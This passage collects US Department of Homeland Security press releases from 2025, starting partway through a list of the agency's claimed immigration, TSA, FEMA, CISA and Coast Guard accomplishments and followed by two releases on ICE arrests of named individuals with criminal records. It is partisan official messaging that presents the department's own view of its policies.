  • In addition to offering CBP Home, DHS announced illegal aliens who self-deport through the app will receive forgiveness of any civil fines or penalties for failing to depart the United States. DHS also made CBP Home more user friendly by eliminating certain steps and making it easier than ever for illegal aliens to self-deport.
  • DHS and DOJ are enforcing our immigration laws and fining illegal aliens who do not depart when they are supposed to. So far, nearly 10,000 fine notices have been issued by ICE.  

Restoring Common Sense to America’s Legal Immigration System 

  • President Trump ended the broad abuse of humanitarian parole and returned the program to a case-by-case basis. As part of this effort, Secretary Noem terminated the Cuba, Haiti, Nicaragua, and Venezuela parole programs.
  • Following victory at the U.S. Supreme Court, DHS began sending termination notices in June, informing the illegal aliens both their parole is terminated, and their parole-based employment authorization is revoked – effective immediately.
  • DHS has returned the Temporary Protected Status immigration program to its original status: temporary. No longer will this program be abused and exploited by illegal aliens. Secretary Noem rescinded the previous administration’s extension of Venezuelan, Haitian, Nicaraguan, Honduran, and Afghan TPS.
  • Secretary Noem terminated Harvard University’s Student and Exchange Visitor Program (SEVP) certification—meaning Harvard can no longer enroll foreign students and existing foreign students must transfer or lose their legal status—for fostering violence, antisemitism, and coordinating with the Chinese Communist Party.
  • It is a privilege, not a right, for universities to enroll foreign students and benefit from higher tuition to help pad their multibillion-dollar endowments. Harvard University repeatedly abused this privilege and even stonewalled DHS’s request for information.   

Initiating a Golden Age in American Air Travel 

  • Secretary Noem terminated the politically motivated Quiet Skies Program, which since its existence has failed to stop a single terrorist attack while costing US taxpayers $200 million a year. The program, under the guise of “national security,” was used to target political opponents and benefit political allies.
  • TSA ended the “shoes-off” travel policy, allowing passengers traveling through domestic airports to keep their shoes on while passing through security screening at TSA checkpoints. This change will drastically decrease passenger wait times at our TSA checkpoints, leading to a more pleasant and efficient passenger experience.
  • The Trump administration fully implemented REAL ID enforcement measures nationwide—a law signed 20 years ago. REAL ID helps ensure that travelers are who they say they are and prevents fraud by criminals, terrorists, and illegal aliens. Most travelers have not even noticed a difference because nearly 94% of travelers are already REAL ID compliant.
  • Secretary Noem ended collective bargaining for the Transportation Security Administration’s (TSA) Transportation Security Officers, which constrained TSA’s chief mission to safeguard our transportation systems.  

Fixing Disaster Relief for the 21st Century 

  • The Federal Emergency Management Agency is now shifting from bloated, DC-centric dead weight to a lean, deployable disaster force that empowers state actors to provide relief for their citizens. The old processes are being replaced because they failed Americans in real emergencies for decades.
  • President Trump has established the FEMA Review Council to provide recommendations on how to best conduct disaster relief at the federal level. 
  • Under Secretary Noem’s leadership, the FEMA Review Council is developing a comprehensive plan for necessary change.
  • DHS has empowered state and local governments to lead disaster relief efforts without interference from the federal government.  

Provided Rapid and Effective Support to Flood Victims in Texas 

  • Within moments of the flooding in Texas, DHS assets, including the U.S. Coast Guard (USCG), CBP Border Search, CBP BORSTAR, and FEMA personnel surged into unprecedented action alongside Texas first responders for search and rescue operations.
  • FEMA deployed 311 staffers delivering critical intelligence, aerial imagery, and shelter for 171 survivors.
  • Combined state and federal rescue efforts evacuated and rescued over 1,500 people.   

Getting CISA Back on Mission 

  • Under the Biden Administration, the Cybersecurity and Infrastructure Security Agency (CISA) censored free speech and targeted Americans.
  • Under President Trump’s direction, DHS closed CISA’s politically weaponized offices and fired those responsible for abusing their power.
  • CISA is now back on-mission: Protecting Americans and critical infrastructure from cyberthreats.
  • CISA is shifting away from an all-hazards approach to a risk-informed approach, prioritizing resilience and action over mere information sharing. 
  • CISA personnel are deployed across 10 regions in support of all 56 states/territories. 
  • CISA is also on the front lines of defending America from cyberattacks. 
  • CISA partnered with the FBI and NSA to ensure state and local governments have information and resources necessary for protection.
  • CISA is also providing security support for next year’s FIFA World Cup.
  • Secretary Noem discontinued the Critical Infrastructure Partnership Advisory Council (CIPAC) as a part of the implementation of President Trump’s Executive Order 14217, Commencing the Reduction of the Federal Bureaucracy, and removed members of the Cyber Safety Review Board (CSRB), which CISA oversees.  

Revolutionizing the Coast Guard 

  • When President Trump came back into office, the Coast Guard faced its greatest readiness crisis since World War II because the Biden Administration left it underfunded and neglected.
  • President Trump’s order to surge Coast Guard assets to our maritime border changed the game.
  • In the first few months of the Trump Administration, the Coast Guard seized more cocaine and other illegal drugs than during the entirety of 2024.
  • For the first time in years, the Coast Guard expects to exceed its recruiting goals.
  • In Fiscal Year 2025, the Coast Guard has brought in more than 4,250 recruits – 1,200 more than the same time last year.
  • That’s 108% over the goal.
  • Under Biden, the Coast Guard fell short of its recruiting goals four years straight.
  • Under President Trump and Secretary Noem, the Coast Guard is unleashing “Force Design 2028,” a revolutionary new blueprint that will make the Coast Guard more agile, more capable, and more responsive than ever before.  

Standing up for the American taxpayer 

  • The United States Coast Guard (USCG) eliminated an ineffective information technology (IT) program, saving nearly $33 million, and is now focusing resources where they’re most needed to protect our homeland. 
  • USCG partially terminated a wasteful Offshore Patrol Cutter (OPC) contract with Eastern Shipbuilding Group (ESG), which has been slow to deliver four OPCs, harming U.S. defense capabilities.
  • The Trump Administration stopped aliens on the Terror Watchlist from receiving Medicaid benefits.     
  • Secretary Noem cancelled CISA’s expensive headquarters project, saving taxpayers over half a billion dollars.  

To stop policies that were magnets for illegal immigration, DHS froze all funding to non-governmental organizations that facilitate illegal immigration and announced a partnership with the U.S. Department of Housing and Urban Development to ensure taxpayer dollars do not go to housing illegal aliens. 

###  

ICE Continues to Round Up the Worst of the Worst: Convicted Killer and Fentanyl Trafficker Off American Streets

Source: US Department of Homeland Security

Operations across the U.S. target criminal illegal aliens convicted of burglary, kidnapping, and human trafficking

WASHINGTON — The Department of Homeland Security announced U.S. Immigration and Customs Enforcement (ICE) officers arrested removable criminal illegal aliens across the country on July 17, 2025, as part of coordinated enforcement targeting some of the worst of the worst in our communities. Among those taken into custody were previously deported felons, gang members, and individuals with long histories of violent criminal conduct.

One of the most serious arrests was of Phong Thanh Nguyen, a criminal illegal alien from Vietnam, with convictions for second-degree murder and indecent exposure; a U.S. immigration judge issued a final order of removal in 2012. Nguyen was arrested by ICE Los Angeles officers after it was determined he had violated the terms of his supervision. Despite his murder conviction, indecent exposure conviction, and removal order, Nguyen was released under an Order of Supervision in 2012 during the Obama administration.

“A Vietnamese national murdered someone, exposed himself in public and remained on U.S. soil for years,” said Assistant Secretary Tricia McLaughlin. “ICE has a duty to protect the American public from criminal illegal aliens. President Trump and Secretary Noem will not allow convicted criminal illegal alien killers to hide behind outdated policies. Our message to criminal illegal aliens is clear, leave now. If you don’t, we will find you and deport you, and you will never return.” 

ICE continues to target and remove the worst offenders—those who pose the greatest threat to the safety and security of American communities. Nguyen remains in ICE custody pending removal procedures.  

ICE agents across the country carried out similar arrests of criminal illegal aliens with serious convictions, including: 

  • Abraham Taddesse, an illegal alien from Ethiopia, convicted of rape in the second degree in Upper Marlboro, Maryland.

  • Juan Felix Yanes-Montano, a criminal alien from Cuba, convicted of robbery with a deadly weapon, armed burglary, and kidnapping with a deadly weapon in Miami-Dade County, Florida. 

  • Cesar Porras, an illegal alien from Mexico, convicted of possession with intent to distribute a quantity of a mixture and substance containing fentanyl in Pecos, Texas. 

  • Eduardo Salinas-Gonzalez, an illegal alien from Mexico, convicted of smuggling aliens, escape, and two illegal re-entries in Zapata County, Texas. 

###

ICE Captures Final Delaney Hall Detention Facility Fugitive, Dangerous Criminal Illegal Alien

Source: US Department of Homeland Security

The criminal illegal alien fled the Newark facility and ICE captured him in Los Angeles after a month-long manhunt

WASHINGTON – The Department of Homeland Security (DHS) today announced U.S. Immigration and Customs Enforcement (ICE) captured an illegal alien detainee who escaped the Delaney Hall Detention Facility in Newark, New Jersey. The individual—Andres Pineda-Mogollon—is one of four dangerous criminal illegal aliens who escaped Delaney Hall on June 12, 2025. He is the final detainee to be captured. 

“We are tremendously grateful to our brave ICE agents and law enforcement partners for capturing Andres Pineda-Mogollon and the other three dangerous criminal illegal aliens who escaped Delaney Hall. Politicians and activists relentlessly try to smear ICE—but the facts remain true: Delaney Hall houses dangerous criminals, including these four fugitives who committed aggravated assault, burglary, theft and even threatened to kill law enforcement,” said Assistant Secretary Tricia McLaughlin. “Now, these slimeballs no longer pose a threat to public safety.” 

CAPTURED:

On July 17, 2025, Andres Pineda-Mogollon, an illegal alien from Colombia, was arrested by ICE in Los Angeles, California. He overstayed a tourist visa and entered the U.S. in 2023 under the Biden administration. On April 25, 2025, the New York City Police Department arrested Pineda-Mogollon for petit larceny. On May 21, 2025, the Union, New Jersey Police Department arrested Pineda-Mogollon for residential burglary, conspiracy residential burglary, and possession of burglary tools.

On June 13, 2025, Joel Enrique Sandoval-Lopez, a criminal illegal alien from Honduras, was arrested by ICE, FBI, and Passaic Police in Passaic, New Jersey. During the arrest, Sandoval-Lopez kicked and threatened to kill the law enforcement officers. This criminal illegal alien’s criminal record includes unlawful possession of a handgun and aggravated assault.

On June 13, 2025, Joan Sebastian Castaneda-Lozada, a criminal illegal alien from Colombia whose criminal record includes arrests for burglary, theft, and conspiracy to commit burglary, attempted to turn himself in to local authorities at the New Jersey State Police Bridgeton Station. Due to their sanctuary policies, the State Police refused to take him into custody because they do not work with ICE. On June 15, Castaneda-Lozada surrendered himself to agents from FBI and ICE in Millville, New Jersey.

Franklin Norberto Bautista-Reyes is an illegal alien from Honduras who illegally entered the U.S. in 2021 under the Biden administration. On May 3, 2025, the Wayne Township, New Jersey Police Department arrested Bautista for aggravated assault, attempt to cause bodily injury, terroristic threats, and possession of a weapon for unlawful purposes.

###